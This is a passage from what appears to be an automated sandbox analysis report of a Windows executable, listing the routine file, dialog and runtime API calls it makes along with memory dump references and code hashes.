                                                                                                                                                                                                              • String ID: FlsAlloc
                                                                                                                                                                                                              • API String ID: 2773662609-671089009
                                                                                                                                                                                                              • Opcode ID: c3be5b171e42213be84837dc6e8beb978e433f47ac2927a8af97b3d08d2d22b7
                                                                                                                                                                                                              • Instruction ID: e0e6eb6e8b5921a0b52876c64f68030939fe3fd211db1dea27087a6f33544141
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3be5b171e42213be84837dc6e8beb978e433f47ac2927a8af97b3d08d2d22b7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76E01524A0AA83D1EA04BF72B4510FAE261AF88B84F8C003AE91D07654DE3CE484C720
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBC0E4C: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF75FBC1169,?,?,?,?,?,?,?,00007FF75FBC1319), ref: 00007FF75FBC0E76
                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(?,?,?,00000000,?,00000000,00000001,00007FF75FBC121C,?,?,?,?,?,?,?,00007FF75FBC1319), ref: 00007FF75FBC1462
                                                                                                                                                                                                              • GetCPInfo.KERNEL32(?,?,?,00000000,?,00000000,00000001,00007FF75FBC121C,?,?,?,?,?,?,?,00007FF75FBC1319), ref: 00007FF75FBC1477
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CodeInfoPageValid
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 546120528-0
                                                                                                                                                                                                              • Opcode ID: 2268402d4a2aca544941d68e7c476cfdc96f940329a779a591f13655bab2bee9
                                                                                                                                                                                                              • Instruction ID: 3c7f837ef4e197e4e7f8bf814f3ba8dbe70e1c167c31d5a65af11b990b5aa616
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2268402d4a2aca544941d68e7c476cfdc96f940329a779a591f13655bab2bee9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08819C62E0C6C3C5E761AF35A8401BAF7A1BB44B84FDC4132DA8E576A4DE3DE941C760
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::bad_alloc::bad_alloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1875163511-0
                                                                                                                                                                                                              • Opcode ID: bdc7d76e4e482d0c6040e2fce28c63d16ef644c05874e5a652a5392bbb4c4644
                                                                                                                                                                                                              • Instruction ID: 293e21d231b29a90ec9096bcda8409421ce771c870c75046b2c6cbd44c47a5a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdc7d76e4e482d0c6040e2fce28c63d16ef644c05874e5a652a5392bbb4c4644
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E415D62A0AAC2D4EB65EF31D1403F9A7A0AB54B84F8C4036CB8D17795DF7CE6858325
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$BuffersFlushTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1392018926-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LoadString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2948472770-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$RectText$ClientWindowswprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 402765569-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time$System$File
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2838179519-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFileAttributesW.KERNELBASE(?,00007FF75FB9B4C4,?,?,00007FF75FB97C79), ref: 00007FF75FB9B6ED
                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00007FF75FB9B4C4,?,?,00007FF75FB97C79), ref: 00007FF75FB9B71A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeleteFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4033686569-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,00007FF75FB9B488,00000001,00007FF75FB9B2C1,0000111D,?,?,00007FF75FB97C79), ref: 00007FF75FB9B3D6
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,00007FF75FB9B488,00000001,00007FF75FB9B2C1,0000111D,?,?,00007FF75FB97C79), ref: 00007FF75FB9B3FF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$LoadString$DialogDispatchItemPeekTextTranslateswprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 601060688-0
                                                                                                                                                                                                              • Opcode ID: 82aa128e8539a57056cc77cfd8a92f720249eb72442b728fe3c7635f96eb94eb
                                                                                                                                                                                                              • Instruction ID: 2aad8e410fda1fe303f5751a736409c1374e529f254d8eb87a59db16d0f47119
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82aa128e8539a57056cc77cfd8a92f720249eb72442b728fe3c7635f96eb94eb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5E03955E096C6C6FA1073B0ED013F996D4AF89385FCC0139FA4D57792CD2CD6568622
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF75FBA2DD9,?,?,?,?,?,?,?,?,00007FF75FB9C544), ref: 00007FF75FBA2D88
                                                                                                                                                                                                              • GetProcessAffinityMask.KERNEL32 ref: 00007FF75FBA2D9B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1231390398-0
                                                                                                                                                                                                              • Opcode ID: 36c52fee964b1d07e923aecdfe421dd5a67ccda00a6ef38af63a4af350f5d3be
                                                                                                                                                                                                              • Instruction ID: de21a98f0acbc8b1f6ae89d4420cafd0f8f65f01345bd7336c449149501cf043
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36c52fee964b1d07e923aecdfe421dd5a67ccda00a6ef38af63a4af350f5d3be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8E02B61F145C2C2DF099F75C4504EAB391FFC8B40FC88036D54A83614DE3CE1898720
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1175261203-0
                                                                                                                                                                                                              • Opcode ID: cb728cfa56246d41a190ca8f87e85a0570454b63df53ba17ed7b812c77b783f2
                                                                                                                                                                                                              • Instruction ID: 35558bef3aebd1866e7628e62aecf101d3f286ff1349f73a369b777946213443
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb728cfa56246d41a190ca8f87e85a0570454b63df53ba17ed7b812c77b783f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46E0E561B185C2D7FA60BB31E8543EBD2A4BF98784FC84171E5CD82695DE2CD648C760
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 588628887-0
                                                                                                                                                                                                              • Opcode ID: 124b22454ced5a70d0b54dc7a6e7da9e1185ed39ab18a569fda50e86802df24b
                                                                                                                                                                                                              • Instruction ID: 4952b75ca07efe62693871c8a46fe89b571b6fb43c7f37be6ef0aca87a875573
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 124b22454ced5a70d0b54dc7a6e7da9e1185ed39ab18a569fda50e86802df24b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AE0EC50E1E5C3C7FF18BBB2A8551FAE2D15F9CB55F8C5034CA0D46295EE2CAC868634
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc__vcrt___vcrt_uninitialize_ptd
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3765095794-0
                                                                                                                                                                                                              • Opcode ID: ce76eb26b14415838449865cd5ede78bf3b980bdfab7b25fa4d7bbb502b8a526
                                                                                                                                                                                                              • Instruction ID: 372f3625d92b9b47d2a1cd8ee3e58e5b3fdf8348c27628bfeba78f201c746b53
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce76eb26b14415838449865cd5ede78bf3b980bdfab7b25fa4d7bbb502b8a526
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5E01A70E0D7C2C6FA50BB349C450F9A2506F05314FDC1631D02D861E6DE6CEA4BC63A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcscpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1284135714-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
• Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB3190: GetModuleHandleW.KERNEL32(?,?,?,00007FF75FBB30FF,?,?,?,00007FF75FBB34BA), ref: 00007FF75FBB31B7
                                                                                                                                                                                                              • DloadProtectSection.DELAYIMP ref: 00007FF75FBB3155
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DloadHandleModuleProtectSection
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2883838935-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9B8F8: FindFirstFileW.KERNELBASE(?,00007FF75FB9B79F), ref: 00007FF75FB9B93D
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9B8F8: FindFirstFileW.KERNEL32 ref: 00007FF75FB9B96E
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9B8F8: GetLastError.KERNEL32 ref: 00007FF75FB9B97D
                                                                                                                                                                                                              • FindClose.KERNELBASE ref: 00007FF75FB9B7A8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1464966427-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9FDF8: LoadStringW.USER32 ref: 00007FF75FB9FE7F
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9FDF8: LoadStringW.USER32 ref: 00007FF75FB9FE98
                                                                                                                                                                                                              • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF75FBB258D
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: GetDlgItem.USER32 ref: 00007FF75FBB18C5
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: ShowWindow.USER32 ref: 00007FF75FBB18EB
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB1900
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB1918
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB1939
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB1955
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB1998
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB19AC
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB19C0
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB19EA
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB1A02
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ButtonChecked$LoadString$ItemShowWindowswprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2482695087-0
                                                                                                                                                                                                              • Opcode ID: fff7c9e4bc2c3cd4619abb028f25086067d4fe82ef5478c64b149bd87a6a94ce
                                                                                                                                                                                                              • Instruction ID: a82488e3f4fe82ed8c17ab55c9eb27aee90fa36d43f94a3c4341497daa85303f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fff7c9e4bc2c3cd4619abb028f25086067d4fe82ef5478c64b149bd87a6a94ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BF0E211B086C586FA207671E9163FE8381AF853C8FD84131FAAE077DBDC2CCA444710
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF75FB9A5DD), ref: 00007FF75FB9A658
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                                              • Opcode ID: 212cc4bace8085fef6627fbed83f48c3325ef587dbe45b8668402039f2d85827
                                                                                                                                                                                                              • Instruction ID: 5cc45ec2ec5d1857dd46df46a70780d8163d3a7f960e9f9f32f365a2ef0ba37e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 212cc4bace8085fef6627fbed83f48c3325ef587dbe45b8668402039f2d85827
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6F0A462A08782D4FB64AB34EA443B9B664DB41FB8F9D5334D63C451C4CF28D8958720
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
